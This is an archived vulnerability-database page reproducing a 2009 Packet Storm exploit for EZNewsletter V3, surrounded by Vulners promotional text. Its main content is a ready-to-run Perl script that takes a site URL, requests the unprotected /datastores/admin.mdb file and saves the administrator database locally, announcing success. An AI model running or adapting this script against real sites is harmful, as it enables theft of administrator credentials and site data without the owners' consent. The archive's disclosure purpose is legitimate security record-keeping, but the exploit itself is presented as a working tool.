Lucene search
K

EZNewsletter 3 Database Disclosure

🗓️ 08 Jul 2009 00:00:00Reported by Septemb0xType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

EZNewsletter V3 Database Disclosure, Arbitrary Database Disclosure Vulnerability, Admins Database Download, Remote Database Disclosure Exploi

Code
`  
#!/usr/bin/perl  
#############################################################  
# Application Name : EZNewsletter V3  
# Vulnerable Type : Arbitrary Database Disclosure Vulnerability  
# Infection : Admins Database Download  
# Script Downlaod : http://www.htmljunction.com/eznewsletterv3.zip  
# author : Septemb0x   
#############################################################  
# Greetz BHDR, BARCOD3  
  
use lwp::UserAgent;  
  
system('cls');  
system('title EZNewsletter V3 Remote Database Disclosure Exploit');  
system('color 2');  
if (!defined($ARGV[0])) {print "[!] Usage : \n perl exploit.pl http://sitename/path ";exit();}  
if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; }  
print "\n\n[-] EZNewsletter V3 Remote Database Disclosure Exploit\n";  
print "[+] Author : Septemb0x \n\n\n";  
print "[!] Exploiting $site ....\n";  
my $site = $ARGV[0] ;  
my $target = $site."/datastores/admin.mdb" ;  
my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($target,":content_file" => "c:/db.mdb");  
if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb | Cyber-Warrior Bug Researcher Group | Septemb0x...";exit();}  
else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();}  
_________________________________________________________________  
Sadece e-posta iletilerinden daha fazlasý: Diðer Windows Live™ özelliklerine göz atýn.  
http://www.microsoft.com/turkiye/windows/windowslive/`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation